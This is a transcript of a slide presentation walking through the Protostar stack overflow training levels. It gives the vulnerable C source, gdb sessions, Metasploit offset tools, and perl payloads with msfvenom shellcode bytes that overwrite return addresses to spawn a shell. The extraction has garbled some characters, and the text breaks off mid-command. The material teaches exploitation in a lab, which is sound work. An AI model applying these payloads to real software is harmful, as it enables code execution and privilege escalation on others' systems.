Exploit stack-overflows

Click here to load reader

download Exploit   stack-overflows

of 41

  • date post

    26-May-2015
  • Category

    Technology

  • view

    1.720
  • download

    0

Embed Size (px)

description

Presentation based on Exploit-Exercises.com Protostar virtual machine. Example 6 may not work correctly.

Transcript of Exploit stack-overflows

  • 1. Exploit-Exercises.comStack OverflowsSpenser Reinhardt

2. What Is A Buffer Overflow?A buffer overflow occurs when a program or process tries tostore more data in a buffer (temporary data storage area)than it was intended to hold. Since buffers are created tocontain a finite amount of data, the extra information -which has to go somewhere - can overflow into adjacentbuffers, corrupting or overwriting the valid data held inthem. 3. Tools In UsePerl Inline perl expressions, either using $( expression ) or expression | program,depending on the need. Used to quicklyGDB GNU Debugger, allows debugging of applications, inspecting of livevariables, memory, and registers. Crash dumps know as core files can also beanalyzed in the same manors.Metasploit Console: In ../msf/toolsPattern_Create.rb Creates a specialized pattern that can be used to identifyhow many bytes into a buffer important locations are such as EIP orvariables Pattern_Offset.rb Based on a small subset of bytes returned from overflowed buffers filled with patterns from pattern_create, this locates how far into the buffer the bytes that returned are. Venom Creates shellcode, with the ability to change function, and encode shellcode to avoid bad characters and detection. 4. Preparing ProtostarIn virtual console windowLogin User: root Pass: godmodeGet an IP dhclient & ifconfig | grep inet addr 5. Preparing Protostar Cont.Loginssh user@[IP]Pass: userUnlimit core dumpsulimit -c unlimitedulimit -a | grep coreChange to bash shell/bin/bashChange to binary dircd /opt/protostar/bin/ 6. Level 0 (Source)int main(int argc, char **argv) {volatile int modified;char buffer[64];modified = 0;gets(buffer);if(modified != 0) {printf("you have changed the modified variablen");} else {printf("Try again?n");}} 7. Level 0 (Diagram)The Stack Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Char buffer = 64 bytesUninitalizedstack space 8. Level 0(Solution)/opt/protostar/bin$ ./stack0 test Try again?/opt/protostar/bin$ perl -e print "a"x68 | ./stack0 you have changed the modified variable 9. Level 1(source)int main(int argc, char **argv) {volatile int modified;char buffer[64];if(argc == 1) { errx(1, "please specify an argumentn");}modified = 0;strcpy(buffer, argv[1]);if(modified == 0x61626364) { printf("you have correctly got the variable to the right valuen");} else { printf("Try again, you got 0x%08xn", modified);}} 10. Level 1The Stack(Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x61626364 Char buffer = 64 bytesUninitalizedstack space 11. Level 1(Solution)./stack1 testTry again, you got 0x00000000./stack1 $(perl -e print "a"x70)Try again, you got 0x61616161./pattern_create.rb 70[MSF Pattern]./stack1 [MSF Pattern]Try again, you got 0x63413163./pattern_offset.rb 63413163 = 64 bytes./stack1 $(perl -e print "a"x64 . "x64x63x62x61nr")you have correctly got the variable to the right value 12. Level 2 (Source)int main(int argc, char **argv) { volatile int modified; char buffer[64]; char *variable;variable = getenv("GREENIE");if(variable == NULL) { errx(1, "please set the GREENIE environment variablen");}modified = 0;strcpy(buffer, variable);if(modified == 0x0d0a0d0a) { printf("you have correctly modified the variablen");} else { printf("Try again, you got 0x%08xn", modified);}} 13. Level 2The Stack(Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x0d0a0d0a Char buffer = 64 bytes Char *variableUninitalizedstack space 14. Level 2(Solution)./stack2 stack2: please set the GREENIE environment variableexport GREENIE=$(perl -e print "a"x80)./stack2 Try again, you got 0x61616161./pattern_create.rb 70[MSF Pattern]export GREENIE=[MSF locator string]./stack2 Try again, you got 0x63413163./pattern_offset.rb 63413163 = 64 bytesexport GREENIE=$(perl -e print "a"x64 . "x0ax0dx0ax0dnr")./stack2 you have correctly modified the variable 15. Level 3(Source)void win() {printf("code flow successfully changedn");}int main(int argc, char **argv) {volatile int (*fp)();char buffer[64];fp = 0;gets(buffer);if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp();}} 16. Level 3The Stack(Diagram)Previous Stack FramesContains previous EIP & ESP Int fp = 0Must point to win()Win() = 0x08048424 Char buffer = 64 bytes void win() {printf("code flow successfully changedn"); } fp = 0;Uninitalized gets(buffer);stack spaceif(fp) {printf("calling function pointer, jumping to 0x%08xn", fp);fp();} } 17. Level 3 (Solution)./stack3 Testperl -e print "a"x80 | ./stack3 calling function pointer, jumping to 0x61616161 Segmentation fault./pattern_create.rb 70[MSF Pattern]./stack3 - [MSF Pattern] calling function pointer, jumping to 0x63413163./pattern_offset.rb 63413163 = 64 bytesobjdump -d ./stack3 | grep win08048424 perl -e print "a"x64 . "x24x84x04x08nr" | ./stack3 calling function pointer, jumping to 0x08048424 code flow successfully changed 18. Level 4(Source)void win() { printf("code flow successfully changedn");}int main(int argc, char **argv) {char buffer[64];gets(buffer);} 19. Level 4The Stack (Diagram)Previous Stack FramesContains previous EIP & ESP EIP must point to win() Win() = 0x080483f4 Char buffer = 64 bytes void win() {printf("code flow successfully changedn"); }Uninitalized fp = 0;stack spacegets(buffer); if(fp) {printf("calling function pointer, jumping to 0x%08xn", fp);fp();} } 20. Level 4(Solution)./stack4 Testperl -e print "a"x80 | ./stack4 Segmentation fault./pattern_create.rb 70[MSF Pattern]Gdb quiet ./stack4Run - [MSF Pattern]Program received signal SIGSEGV, Segmentation fault.0x63413563 in ?? ()./pattern_offset.rb 63413563 = 76 bytesobjdump -d ./stack4 | grep win080483f4 perl -e print "a"x76 . "xf4x83x04x08" | ./stack4 code flow successfully changed Segmentation fault 21. Level 5(Source)int main(int argc, char **argv) {char buffer[64];gets(buffer);} 22. Level 5The Stack(Diagram)Previous Stack FramesContains previous EIP & ESPOverwritten with nop sled andShellcode.Current EIP must be overwrittento point to our shellcodeEIP = 0x08048424Char buffer = 76 bytesint main(int argc, char **argv) {Uninitalizedstack spacechar buffer[64]; gets(buffer);} 23. Level 5(Solution 1)perl -e print "a"x80 | ./stack5Segmentation fault./pattern_create.rb 80[MSF Pattern]Gdb -quiet ./stack5run[MSF Pattern]Program received signal SIGSEGV, Segmentation fault.0x63413563 in ?? ()(gdb) x $esp0xbffff7c0./pattern_offset.rb 63413563 = 76 bytesLocation of EIP = 0xbffff760 + 76h = 0xbffff7d6 24. Level 5(Solution 2)msfvenom -p linux/x86/exec -f pl -b x00xff CMD=/bin/bash PrependSetresuid=true = ~70bytesperl -e print "a"x76 . "xc0xf7xffxbf" . "x90"x16 ."xdbxd3xd9x74x24xf4x5dxbbx62x1axd1xfex2bxc9xb1x0bx83xedxfcx31x5dx16x03x5dx16xe2x97x70xdaxa6xcexd7xbax3exddxb4xcbx58x75x14xbfxcex85x02x10x6dxecxbcxe7x92xbcxa8xf0x54x40x29x2ex37x29x47x1fxc4xc1x97x08x79x98x79x7bxfd" | ./stack5Result: Program exits cleanly without executing a shell.Reason: /bin/dash has issues with the incoming stdin from the original Program. It must check for this issue and close automatically. This Is due to the gets() function being used.More Details: StackOverflow.com 25. Level 5(Solution 3)msfvenom -p linux/x86/exec -f pl -b xcox04x00xff CMD=touch /tmp/touchPrependSet resuid=trueperl -e print "a"x76 . "xc0xf7xffxbf" . "x90"x16 ."xdaxd0xbbx78xe4x7ax44xd9x74x24xf4x58x29xc9xb1x0ex31x58x17x83xc0x04x03x20xf7x98xb1xbaxfcx04xa3x68x65xddxfexefxe0xfax69xc0x81x6cx6ax76x49x0fx03xe8x1cx2cx81x1cx0fxb3x26xdcx44xdcx53xbfxccx02xb3x4bx60x33xe4xc7x15xc6x99x4fxeax7fx0dx06x0bxb2x31" | ./stack5user@protostar:/opt/protostar/bin$ ls /tmp/touchLocal shell code for gets() - http://www.exploit-db.com/exploits/13357/ 26. Level 6(Source)void getpath(){char buffer[64];unsigned int ret;printf("input path please: ");fflush(stdout);gets(buffer);ret = __builtin_return_address(0);if((ret & 0xbf000000) == 0xbf000000) { printf("bzzzt (%p)n", ret); _exit(1);}printf("got path %sn", buffer);}int main(int argc, char **argv { getpath();} 27. Level 6The Stack(Diagram) Previous Stack Frames Current EIP Char buffer = 64 bytesUninitalizedstack space 28. Level 6The Stack(Diagram 2)This address Address of SHELLCODE Address of SHELLCODE Address of FORMATSTRING Address of execl() Address of printf() Previously EIP Char buffer = 64 bytesUninitalizedstack space 29. Level 6 (Solution 1)./pattern_create.rb 100[MSF Pattern]Gdb -quiet ./stack6RunInput path please:[MSF Pattern]got path [MSF Pattern]Program received signal SIGSEGV, Segmentation fault.0x37634136 in ?? ()./pattern_offset.rb 0x3763413680msfvenom -p linux/x86/exec -f pl -b xcox04x00xff CMD=touch/tmp/touch PrependSet resuid=true[SHELLCODE] ~ 80 bytesperl -e print "a"x80 . "xf0xf7xffxbf" . [SHELLCODE] | ./stack6input path please: bzzzt (0xbffff7f0) 30. Level 6 (Solution 2)gdb --quiet ./stack6 (gdb) break main Breakpoint 1 at 0x8048500: file stack6/stack6.c, line 27. (gdb) run Starting program: /opt/protostar/bin/stack6 Breakpoint 1, main (argc=1, argv=0xbffff864) (gdb) print printf $1 = {} 0xb7eddf90 (gdb) print execl $2 = {} 0xb7f2e460 export FORMATSTRING=%3$nexport SHELLCODE=/location/to/shellcodefile~/getenvaddr FORMATSTRING ./stack6FORMATSTRING will be at 0xbffff9a7~/getenvaddr SHELLCODE ./stack6SHELLCODE will be at 0xbffff9b6 31. Level 6 (Solution 3)(Using altered stack6 binary)~/stackx input path please: a 0xbffff75c got path agdb --quiet ~/stackx (gdb) break getpath Breakpoint 1 at 0x804848a (gdb) run Starting program: /home/user/stackx Breakpoint 1, 0x0804848a in getpath () (gdb) x/4000s $esp 0xbffff966:"/home/user/stackx" 0xbfffffea:"/home/user/stackx" 32. Level 6 (Solution 4)/home/user/stackx = 17 bytes/opt/protostar/bin/stack6 = 25 bytesDifference of = 8 bytesShows twice in mem= 16 bytes total80 x a= 80 bytes20 for other addresses= 20 bytesStarting point of = 0xbffff75cperl -e printf("0x%08